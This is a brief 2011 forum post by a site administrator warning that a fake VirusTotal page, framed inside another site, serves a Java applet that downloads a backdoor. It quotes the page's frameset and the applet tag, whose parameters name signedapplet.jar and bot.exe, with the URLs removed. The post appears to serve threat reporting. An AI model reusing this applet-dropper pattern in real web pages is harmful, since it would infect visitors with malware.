Author Topic: Fake Virustotal page leads to backdoor  (Read 8433 times)

0 Members and 1 Guest are viewing this topic.

May 22, 2011, 04:54:06 pm
Read 8433 times


  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Code: [Select]
has a frame containing a fake Virustotal page
Code: [Select]
    <meta name="description" content="">
    <meta name="keywords" content="">
  <frameset rows="*" framespacing="0" border="0" frameborder="NO">
    <frame src="" name="dot_tk_frame_content" scrolling="auto" noresize>


Page contains a java applet that downloads a backdoor.
Code: [Select]
<applet code="Main.class" archive="signedapplet.jar" width="30" height="20" >
<param name="fileName" value="bot.exe">
<param name="url" value="">
Ruining the bad guy's day